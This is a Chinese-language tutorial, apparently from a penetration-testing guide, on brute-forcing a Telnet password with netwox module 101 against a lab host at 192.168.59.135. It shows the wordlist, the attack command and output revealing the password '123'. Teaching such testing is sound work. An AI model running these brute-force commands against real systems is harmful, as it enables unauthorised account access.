暴力破解Telnet服务

远程登录 Telnet 服务器需要知道登录的用户名和密码。如果只知道用户名而不知道密码是无法登录的。在渗透测试中,就需要对密码进行暴力破解。

netwox 工具提供了编号为 101 的模块,用于密码暴力破解。

【实例】已知 Telnet 服务器的 IP 地址为 192.168.59.135,登录用户名为 sm。使用密码字典 password.txt 进行暴力破解,获取登录的密码。

1) 查看密码字典 password.txt 中的密码,执行命令如下:

root@daxueba:~# cat /password.txt

输出信息如下:

admin
abc
19890106
123
ab12
root

以上输出信息显示该密码字典中有 6 个密码。

2) 进行密码暴力破解,执行命令如下:

root@daxueba:~# netwox 101 -i 192.168.59.135 -L sm -w /password.txt

输出信息如下:
Trying(thread1) "sm" - "admin"    #尝试使用密码admin
Trying(thread2) "sm" - "abc"
Trying(thread3) "sm" - "19890106"
Trying(thread4) "sm" - "123"
Trying(thread5) "sm" - "ab12"
Couple(thread2) "sm" - "abc" -> bad
Trying(thread2) "sm" - "root"
Couple(thread1) "sm" - "admin" -> bad    #使用密码admin进行匹配,密码错误
Couple(thread3) "sm" - "19890106" -> bad
Couple(thread5) "sm" - "ab12" -> bad
Couple(thread4) "sm" - "123" -> good    #使用密码123进行匹配,密码正确
Couple(thread2) "sm" - "root" -> bad
输出信息显示,尝试使用密码字典的所有密码与用户名进行匹配。如果密码错误,将显示 bad;如果密码正确,则显示 good。

这里,暴力破解成功,Telnet 服务器的登录密码为 123。

相关文章

起步 处理器架构,参考 x86是指intel的开发的一种32位指令集...
pscp pscp -P 22 C:\work\test.txt root@192.168.1....
文件处理 ls -a # 显示所有文件 ls -l # 显示详细信息 ls -d...
准备一台电脑(我就用联想拯救者r7000演示) 参考博客制作启...
认识 Linux系统是参考了UNIX系统作为模板开发的,但没有使用...
文件处理命令 以 . 开头的文件是隐藏文件 以 - 开头表示这是...